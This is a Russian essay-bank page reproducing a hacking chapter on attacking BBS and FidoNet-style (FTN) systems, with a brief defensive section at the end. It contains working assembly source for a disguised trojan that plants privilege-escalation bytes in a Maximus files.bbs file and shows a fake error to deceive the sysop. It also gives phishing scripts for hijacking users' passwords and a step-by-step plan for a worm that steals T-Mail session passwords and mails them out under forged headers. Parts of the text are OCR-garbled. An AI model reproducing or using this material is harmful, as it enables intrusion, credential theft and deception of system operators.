Реферат: BBS и FTN сети - текст реферата. Скачать бесплатно.
Банк рефератов, курсовых и дипломных работ. Много и бесплатно. # | Правила оформления работ | Добавить в избранное
 
 
   
Меню Меню Меню Меню Меню
   
Napishem.com Napishem.com Napishem.com

Реферат

BBS и FTN сети

Банк рефератов / Компьютерные сети

Рубрики  Рубрики реферат банка

закрыть
Категория: Реферат
Язык реферата: Русский
Дата добавления:   
 
Скачать
Microsoft Word, 186 kb, скачать бесплатно
Заказать
Узнать стоимость написания уникального реферата

Узнайте стоимость написания уникальной работы

BBS И FTN-СЕТИ 5 этой главе описаны методы взлома BBS и FTN-сетей , как программные , так и "обман- н ые ", Представлен исходный текст программы-взломщика с комментариями . Подробно рассказано о "слабых мес- тах " различных программ для BBS и FTN-сетей . Даются ре- комендации по защите компь- ютера от несанкционирован- ного про н икновени я. BBS - Bulletin Board System (электронная доска объявлений ). Это не- большой информационны й центр на базе микрокомпьютера (с винчес- тером большого объема ), к которому пользовате ли могут подключиться через свой компьютер п о телефонной сети в ре жиме точка - точка . Работая с BBS, пользователи могут не толь ко скопировать оттуда име- ющийся файл , но и оставить свой . Файлом может являться как письмо, так и обычная программа . Как п равило , BBS работает в ночное время, а днем э то обычный телефонный ном ер . Главным н а BBS является сис- темный оператор (SysOp), который и назначает ее правила и тематику. Услуги BBS часто являются бесплатными , для связи с ней достаточно обычной терминальной программы . Пр и первом входе нужно зарегист- рироваться , зат ем абоне н ту выделяется определенный промежуток вре- мени для работы . Часто вы деляемого времени недостаточно , тогда появ- ляетс я потребность к взлому BBS. О том , как над о звонить на подобные BBS, как получать отт уда файлы и писать письма , можно узнать в спе- циальн о й литературе . Поставл енная задача - рассказать читателю , ка- ким обр азом можно повысить себе уровень доступа или получить пол- ный доступ к компьютеру . Для системных операторов это будет лишним поводом задуматься о том , как страшны пос ледствия безгра- мот н ости ... Взлом BBS Существует большое количество программ , п редназначенных для созда- ния и поддержания р аботы BBS. Рассмотрим самую популярную среди них - Maximus. Несанкционированно проникнуть на BBS, получить доступ к закрытым областям , уничтожить инф ормацию - такие задачи ставит перед со бой взломщик . Существуют так называемые списки файлов , в которых содержится ин- формация о дост упных пользователям этой BBS ресурсах . Как прави ло, такие списки есть в каждой специальной тематической конференции. Польз ователи могут скопировать оттуда какой-либо файл или оста вить свой . В программе Maximus списком всех файлов , доступных в конфе- ренции , является файл с названием files.bbs. Специально для этой программы создан язык программирования , схожий с языками С и P ascal. На нем можно писать собственные программы под BBS. Скорее всего , именно поэт ому большинство системных опера- торов предпочита ют использовать Maximus. После компиляции напи- санной программы ее можно добавить в общу ю базу Maximus, и она начнет работать . Каждая откомпилированная программа приобрета ет определенную мас- ку файла . Откомпилированная МЕС-программа имеет маску *. bbs, схо- жую с ма ской списка файла . Обычно в этих файлах со держатся списки, но если в коде в стречаются какие-либо служебные команды , они б удут выполнены . Этим взломщик и может восполь зоваться . В Maximus существуют два языка : МЕС и МЕ Х . Язык МЕС очень прост , разобраться в нем может каждый . Он позволяет оперировать раз- личными данными , заставками на BBS, ба зой пользователей . Систем- ный оператор обязатель но должен знать этот язык . Используя команду "PRIV_UP" языка МЕС системный оператор мо- жет без особых усилий повыш ать уровень пользователя , при условии, что пос л едний будет писать и отправлять файл ы на станцию . С повы- шением уровня , пользо ватель получает дополнительные возможности (увел ичивается доступное для работы время , объем информации , кото- рую можно получить с BBS). Эти м и может воспользоваться хакер . Ему остается только найти BBS, работающую на програм ме Maximus, на ко- торой есть много файловых кон ференций . При этом одна из этих кон- ферен ций должна быть пустой (то есть в ней не должно быть файла files.bbs, содержащего дос тупные файлы в данной конференци и ). Таким образом , остается проверить только одно условие - если все копируе- мые на BBS файлы помещаются в конференцию , которая была вы брана последний раз , то такую BBS можно взломать без особых усилий . Хаке- ру остается толь ко создать файл files.тес , зап и сать в него команду PRIV_UP, затем откомпилировать эт от файл при помощи компилятора МЕССА (теперь он будет называться files.bbs) и отправить его на BBS. С этого момента хакер может подни мать свой уровень доступа , просмат- ривая данн ую конференцию , пока он не достигн ет уровня системного оператора станции . После этого компьютер окажется полностью в его р аспоряжении . Если под рукой не оказалось компилято ра МЕССА , то создать files.bbs можно и вручную . Для этого нужно создать файл files.bbs, а зате м ввес- ти в него команду повышения уровня - на языке Maximus это всего три символа ( код первого - 23h, следующие два - символы pU). Еще один способ взлома BBS рассч итан на неграмотных системных опе- раторо в , не обладающих глубокими знаниями . Он за ключается в том, что на станцию засылается программа (причем безразлично , куда она попадет ), которая сама добавит команду повышения уровня в файл files.bbs. Во время просмотра дост упных файлов хакеру автома т ически бу дет подниматься уровень . Ниже приведен текст похожей исходной программы - фантазия тут мож ет быть безгранична . Эта программа до- бавляет в файл files.bbs байты , повышающие уровень польз ователю. После того , как системный оператор за пустит эту прог р амму на своем ко мпьютере , программа ищет файл files.bbs и дописывает туда три бай- та . Приведенный пример расс читан на системных операторов , которые держат свои файлы в каталоге , по умолчанию пре длагаемом программой для установки . Хотя можно добавить поис к files.bbs по всему винчес те- ру компьютера . assume cs:cseg, ds:cseg cseg segment org 100h start: . Найдем файл FILES.BBS mov ah,4Eh mov dx.offset fname mov cx,20h int 21 h ;Если файл отсутствует , то в ыйдем из программы - ;здесь нечего исправлять jc exit ;0ткроем найденный файл mov ax,3D02h mov dx,9Eh int 21 h jc exit -.Установим указатель чтения /записи в конец файла mov bx.ax mov ax,4202h хог сх.сх xor dx,dx int 21h Записываем в файл три ба йта mov ah,40h mov cx,3 mov dx.offset bytes int 21 h jc exit ;3 акроем файл mov ah,3Eh int 21 h [Выдадим сообщение об ошибке и выйдем в DOS. Дело в том, ;что отрабо тавшая программа не должна вызвать подозрений системного оператора . Цель - заставить систе много оператора думать , что файл испорчен . Возможно , он допустит , что иногда ;при передаче файло в происходят ошибки , и поэтому файл ;мог стать неработоспособным exit: [Выдадим сообщение об ошибке mov ah,09h mov dx, offset message int 21 h ; Выход в DOS mov ah,4Ch int 21 h ;Mycop - специально для того , чтобы упаковать ;файл утилитой PKLITE Garbage db 12000 dup ("A") ; Имя файла "FILES.BBS" fname db "files.bbs",0 ; Сообщение об ошибке message db "CRC file error", 13,10,"$" . Записываемые байты byte s db 23h,"pU" cseg ends end start После того , как файл откомпили рован , его нужно упаковывать , чтобы системный оператор ничего не заподозрил . Этот файл б удет содержать большое количество непонятных символов , и при быстром просмотре распознать скрытую в нем программу практически невозм ожно . tasm.exe vzlom.asm tlink.exe vzlom.obj /t pklite vzlom.com После этого файл отправляется на BBS и комментируется как демонст- рационная программа или как утилита для DOS. Дальше взломщик у остается только ждать , пока системный опера тор запустит файл . Через некоторое время можн о звонить и наслаждаться . Данный метод не сра- ботает , если настоящая опция File Titles в Maximus заменена на ей по- добную . Полу чение пароля BBS без взлома Рассмотренные выше способы взлома BBS предпо лагают наличие у пользователя базовых знаний о системе . Теперь немного о том , как мо жно достать пароль еще проще . Практически на каждой BBS суще- ствуют неопытные пользователи , имеющи е высокий уровень доступа (инфо рмация об уровне доступа пользователей BBS досту пна почти всегда ). Если же такого пункта н ет , то "хорошего " пользователя всегда можно вы числить , например , по времени , которое он п роводит на стан- ции , или по объему скопир ова н ной и присланной им информаци и. Итак , определив человека , паролем которого неплохо завладеть , пишем ему письмо о том , что по техническим причинам (причину придум ыва- ем любую , главное правдоподобную ) ему сле дует изменить свой рабо- чий пароль (предлагае м н овый , например "НАСК _01"). После т ого , как пользователь поменяет свой пароль (на это ему нужно отвести дня два- три , п оскольку в один день он может не позв онить , в другой - только поменяет пароль , в общем , время ему понадобиться ), можно беспрепят - ственно входить под его именем и пользоваться системой . Главное , что- бы письм о было написано от имени системного опера тора или какого- либо администратора данной с истемы . Если система не позволяет менять имя адресата в поле FROM, стоит зайти в нее под другим име- нем (к примеру , Mr. CoSysOp) и написать подобное письмо . Наверное, не н адо предупреждать , что все данные , указанные при регистрации под заведомо ложным именем , не должны быть настоящими . Можно предложить еще один спо соб проникновения - метод "забыва- ния пароля ". В ся хитрость в том , что при входе в систему указывается имя какого-либо пользователя этой BBS, пароль которого , естественно, не известен . После неудачных попыток ввода пароля (н е надо пытаться его подобрать , лучше сделать вид , что пароль забыт , вводя разли чные слова , типа Sprite, Cola и так далее ) нужно сос тавить письмо системно- му оператору с просьб ой поменять "забытый " пароль на другой . Ука зы- ваем новый пароль , затем сочиняе м душещипательную историю о ка- ком-нибудь хакере , якобы подобравшем наш пароль на другой BBS или вообще в Интернет , из-за чего приходится использовать на всех систе- мах разные пароли . Если системный оператор не очень опытный , выс- лушав такую ужасную ист о рию он обязательно войдет в положение не- счастного и выполнит его просьб у - поменяет текущий пароль на предложенный . Д альше - полная свобода действий . Работоспособность данного метода зависит от того , насколько опытен оператор , а также убедительна ли вы д у манная история . Прочитав ее , сис темный оператор не должен и предположить , что его обманывают . Взлом FTN-сетей Что можно сказать о широко используем ой технологии FTN? Множе- ство лазеек для взлома . Чего стоит почтовый файл РКТ , содержащий в себе незашифро ванный пароль , узнать который никаких проблем не составляет ! А ф айлы с паролями в уважаемом всеми T-Mail, храня щие- ся в нешифрованном виде и доступные любому грамотному человеку, впрочем , как и все конфигурационные файлы наиболее распространен- н ых прогр а мм для работы с FTN? На основе подобных промахов в раз- работке уже давно написаны программы , позволяющие сло мать ту или иную BBS, вызвать режим DoorWay и сотв орить с удаленным сервером все , что угодно . Однако это еще не предел возможностей программиста. П одумаешь , сломать BBS! Власть над одной из BBS - ничто в сравне- нии с тем , что хакер может держать в своей руке почту от сотен почто- вых узлов , отправлять почту от чужого имени , действовать от лица дру- гого члена или пользователя FTN. Фантастика ? Нет - реальность . Почитатели Эдгара По наверняка знают выражение "Червь-Победи- тель ". Собственно , любой гр амотно написанный "червь " станет победи- телем , если выйдет на свободу . Особенно с примен ением свежих идей. Применяя технологию СМ (сам оразмножающиеся мех анизмы ), называ- емую в народе "компьютерные вирусы ", можно добиться не малого . Включив в свой СМ некоторую особенность , вместо привычной дест- рукции можн о получить парольный доступ ко мн огим почтовым узлам со всеми вытекающими отсюда последствиями . Как известно , при ус- тановке соединения между двумя FTN-мейлерами они ср авнивают свои адреса и пароли . То есть сн ачала хост получает основной адрес звонящего мейлера и пароль на сессию . Если в конфигурации хоста указаны адрес и пар оль звонящего и они совпадают с предъявле нным паролем , хост показывает звонящему свой пароль и при совпадении таковых происходит п арольная сессия . В подавляющем большинстве случае в электронная почта передается только в парольные сессии, иначе любой мейлер мог бы предъявить хосту подставной адрес и заб- рать почту , предназначенную для друг их . В данном случае для того, чтобы перехв атывать чужую электронную почту или действова ть от лица какого-либо системного оператора , н еобходимо узнать пароли на сессию звонящей системы и хоста , ожидающего звонка . Кто-то ирони- чески улыбнется : "Как же их можно узнать , если нет возможности "прик инуться хостом ", чтобы звонящая система показа ла свои пароли, если она звонит совсем по другом у номеру телефона ?!". Разумеетс я. Но это не нужно . Кто-то скажет : "В та ком случае получить эти паро- ли и от хоста нельзя , поскольку он не будет предъ являть свой пароль и не включит парольную сессию , пока не увидит , что предложенный па роль совпадает с его п аролем !" Ко нечно . Но это тоже не нужно. Что же пр едпринять ? Дело в том , что и хост , и звонящая система мо- гут преподнести свои пароли "на блюдечке ". Для этого не нужно за- хватывать в заложники семью системного оператора или предлагать миллионы долларов х озяину системы - достаточно разместит ь на ком- пьютере системного оператора незаме тную программу , которая эти па- роли найдет и отправит на какой-либо из указанных FTN- адресов. Вот и все . Больше ничего не нужно . Теперь несколько возможностей реализации эт ого плана . В странах бывшего СССР н аиболее часто используется DOS-совместимый мей- лер Андрея Елкина T-Mail, поэтому принципы взлома рассмотрены на примере системы , работающей именно на его основе . Некоторые пользуются программ ой Антона Дейнова "SantaFox- M ail", принципы ее взлома похожи , кроме того , взломать эту систему гораздо легче бла- годаря встроенной функции DoorWay. Но об этом ниже . Итак , что ж е программа должна сделать с системой , чтобы заветные пароли нако- нец-то были получены ? Собственно , алгори т м весьма прост , и описать его можно примерно так : 1. Определение расположения программы T-Mail на жестком диске системы . 2. Определение расположения конфигурационных файлов системы . 3. Извлечение списка паролей и ад ресов из конфигурации системы . 4. Шифрование списка паролей и адресов с эмуляцией PGP-кодирования . 5. Отправление зашифрованного списка паролей и адресов через ап- линка по роутингу на систему взломщика . Теперь рассмотрим возможные способы реализации . Теоретически это не сложно . Как правило , системные операторы держат свой T-Mail на жестком дис- ке . Первая задача - определить , куда же оператор спрятал свое "сокро- вище ". Тут-то и намечается разделение . Можно написать "троя нца ", подсадить его в какую-либо конкретную систему и ждать , когда эта система пришлет свои пароли п о почте . Но можно написать и "вирус ", р асходящийся на несколько почтовых узлов , посл е чего все зараженные узлы сообщат пароли на сессии со всеми своими пар о льными линками. Можно искать T-Mail по всему жесткому диску с помощью рекурсивно- го об хода всех логических дисков и вложенных к аталогов . Понятно , что этот метод не так у ж деликатен , поскольку системный оператор мож ет заметить , что некая программа на прот я жении нескольких минут поче- му-то занимает винчестер . От такой глупости откаж емся . Другое дело, если этим будет заниматься вирус . Почему ? Да потому , что большин- ств о вирусов отслеживают вызовы функции 4Bh DOS-прерыв ания 21h для заражения программ . В так о м случае , что мешает этому вирусу ана- лизировать запущенные программы на предмет "а не T-Mail ли это ча- сом ?" и находить "сокровища " именно таким образом ? Ничего . Ана лиз правильнее будет вести не только по имени запускаемого файла , пото- му что системн ы й оператор мог переименовать прогр амму , а в данном случае необходима максимальн ая надежность . Поэтому лучше всего от- лавлива ть T-Mail по постоянной сигнатуре ЕХЕ-файла . Узнав , где находится программа T-Mail, можно определить , где находят- ся ее конфигурац ионные файлы . Если при запуске T-Mail ключ "-С " не задан (кстати , перехват командной с троки - это еще один довод в пользу того , что поиск программы корректнее выполнять п ри помощи вируса ), основным файлом конфигурации является "T-MAIL.CTL", на- ходящийся в том же каталоге , что и T-Mail. При запуске программы ключ "-С " задает путь и имя основного к онфигурационного файла , ко- торый понадобится для взлома . Так что необходимо предусмотреть оба варианта запуска . После определения места расположения основного конфигурационного файла нужно пол учить путь еще к двум файлам - файлу паролей и файлу подстановок (пароли могут находиться в обоих файлах ). Важное замечание : если пароль для какого-либо адре са ука зан в файле подстановок , его дублер из фа йла паролей игнорируется . Путь к файлу паролей указан в пер еменной Security, к файлу подстано- вок - в переменной SubstList. Переменная конфигурационного файла - это строка , начинающаяся со специальных слов . Например , строка : Security C:\NETWORK\T-MAIL\PASSWORDS.LST называется переменной Security и содержит путь и имя файла паролей, в то время как строка SubstList C:\NETWORK\T-MAIL\SUBST.LST называется , соответственно , переменной SubstList и содержит путь и имя файла подстановок . Разумеется , было бы нежелательно отправ- лят ь эти два файла вложением (attach), поскольку он о может поте- ряться . Надежнее передать эти текстовые файлы по электронной почте в вид е обычного письма . Тут возникает проблема : если сист е мный оператор станции , чер ез которую будет проходить это послание (в едь всем известно о его праве читать тра нзитную почту ), обнаружит паро- ли , он немедлен но предупредит об этом того оператора , у кого эти па- роли были украдены . Последни й договорится со в с еми линками о но- вых паролях , и все старания окажу тся напрасными . То есть в целях конспирации придется зашифровать письмо , чтобы при его просмотре казалось , что оно содержит прикреп ленный файл . Разумеется , это не обязательно до лжен быть настоящий PGP, до с таточно л ишь внеш- него сходства и невозможности быстр о расшифровать засекреченное послание . Это неплох ая гимнастика для ума , поскольку хакер дол жен уметь не только расшифровывать , но и маскироваться , не только ло- мать , но и стр оить . Теперь нужно выбрать адрес , на к оторый придет это письмо . Желатель- но отправи ть его по e-mail в Internet через FTN-Internet гейт . Дело в том , что в таком случае пострадавшему с истемному оператору будет очень сложно найти отправителя . Очевидно , в этом письме поле "From:" и о б ратный адрес должны бы ть подставными . Это собьет сис- темного операт ора с толку , и он не станет удалять или задерживать письмо , особенно если в не го добавлены "лишние " клуджи "(c)Via:". О том , как создать нетмейл письмо , можно прочитать в FTS. Почему же SantaFox-Mail сломать гораздо проще ? Дело в том , что в основном конфигур ационном файле SF-Mail имеется переменная , ука- зывающа я пароль на режим DoorWay. От "червя " требуется только за- да ть какой-либо заранее изве стный пароль на пользование DoorWay, после чего нужно соединиться терминальной программой с этой систе- мой и набирать это слово . П опав в DoorWay, файлы паролей и подста- новок мо жно украсть "голыми руками ". Конечно , если с истемн ы й опе- ратор заметит , что к то-то брал у него эти файлы , он примет соответствующие меры . Кроме того , после измен ения паролей могут появиться сбои в работе системы - пользователи будут пытаться войти в DoorWay со старыми паролями , но они не будут работать . Я сно , что оператор об этом узнает очень скоро . Как было показано в предыдущей части , "червь " может не только воро- вать пароли , но и задавать свои . В T-Mail нет режима DoorWay, зато есть так называемый "главный пароль системы ", заданный в перемен- ной T-Pa ssword осн овного конфигурационного файла . Изменив этот паро ль , можно послать на удаленную систему пис ьмо с соответствую- щими указаниями к действи ям и добиться нужного результата . Об указаниях подробно написано в доку ментации по программе T-Mail, но нужно помни ть , что системный оператор будет оповещен обо всех несоответствиях и сбоях в работе системы . Безопасность вашей BBS Если у вас дома стоит собственная BBS или вы только собираетесь ее открыть , сна чала нужно позаботиться о ее безопасности . Во-первых , прежде чем создать свою BBS, надо выбрать программу для нее . Чем больш е возможностей предоставляет программа , тем б ольше всевозможных лазеек , которыми может восполь зоваться хакер . В Maxi- mus эти лазейки уже опис аны - лучше всего не пользоваться этой пр о- граммой . Если Maximus все-таки использует ся , лучше не устанавливать Ш больше никаких дополнительных утил ит , поскольку именно они могут • I, послужить предпосылкой проникновения хакера на BBS. DOS-SHELL 1В 1 луиис сразу убрать с BBS. Никогда никому нельзя р аскрывать свои па- 1В 1али ' копировать информацию о пользователях также не стоит . Береги- ¦В Т ^5 троянских програм м , копируемых пользователями . Их можно про- ¦н ¦ верять либо отладчиками , либо дизассемблеро м , другого способа нет, ¦В разве что не запускать их совсем . Особое внимание нужно уделить директориям . Никогда не устанавли- вайте программ ный продукт в директорию , предлагаемую програ ммой по умолчанию . Это , несомненно , может обле гчить работу любой троян- ской программе . Также не стоит запускать маленькие файлы , попавшие на станцию извне . Обычно такие пр ограммы и являются "бомбами оп- ределенного де йствия ". Вообще лучшая защита - это нападение . Д ело в том , что хакерами мно- гие называют себя совершенно безосновательно . Хакер по заказу фир- мы-производителя ломает их сист емы , таким образом находя лазейки, которые мог ут быть использованы подобными взломщиками . Т о есть хакер ищет "дыры ", а компания их закрывает . Таким образом , суще- ствуют системы , которые взломать практически нев озможно .
1Архитектура и строительство
2Астрономия, авиация, космонавтика
 
3Безопасность жизнедеятельности
4Биология
 
5Военная кафедра, гражданская оборона
 
6География, экономическая география
7Геология и геодезия
8Государственное регулирование и налоги
 
9Естествознание
 
10Журналистика
 
11Законодательство и право
12Адвокатура
13Административное право
14Арбитражное процессуальное право
15Банковское право
16Государство и право
17Гражданское право и процесс
18Жилищное право
19Законодательство зарубежных стран
20Земельное право
21Конституционное право
22Конституционное право зарубежных стран
23Международное право
24Муниципальное право
25Налоговое право
26Римское право
27Семейное право
28Таможенное право
29Трудовое право
30Уголовное право и процесс
31Финансовое право
32Хозяйственное право
33Экологическое право
34Юриспруденция
 
35Иностранные языки
36Информатика, информационные технологии
37Базы данных
38Компьютерные сети
39Программирование
40Искусство и культура
41Краеведение
42Культурология
43Музыка
44История
45Биографии
46Историческая личность
47Литература
 
48Маркетинг и реклама
49Математика
50Медицина и здоровье
51Менеджмент
52Антикризисное управление
53Делопроизводство и документооборот
54Логистика
 
55Педагогика
56Политология
57Правоохранительные органы
58Криминалистика и криминология
59Прочее
60Психология
61Юридическая психология
 
62Радиоэлектроника
63Религия
 
64Сельское хозяйство и землепользование
65Социология
66Страхование
 
67Технологии
68Материаловедение
69Машиностроение
70Металлургия
71Транспорт
72Туризм
 
73Физика
74Физкультура и спорт
75Философия
 
76Химия
 
77Экология, охрана природы
78Экономика и финансы
79Анализ хозяйственной деятельности
80Банковское дело и кредитование
81Биржевое дело
82Бухгалтерский учет и аудит
83История экономических учений
84Международные отношения
85Предпринимательство, бизнес, микроэкономика
86Финансы
87Ценные бумаги и фондовый рынок
88Экономика предприятия
89Экономико-математическое моделирование
90Экономическая теория

 Анекдоты - это почти как рефераты, только короткие и смешные Следующий
Женщина и секс – это как чиновник и взятка: сначала: - Ой, что вы, нет-нет! Потом: - А что так мало?!
Anekdot.ru

Узнайте стоимость курсовой, диплома, реферата на заказ.

Обратите внимание, реферат по компьютерным сетям "BBS и FTN сети", также как и все другие рефераты, курсовые, дипломные и другие работы вы можете скачать бесплатно.

Смотрите также:


Банк рефератов - РефератБанк.ру
© РефератБанк, 2002 - 2016
Рейтинг@Mail.ru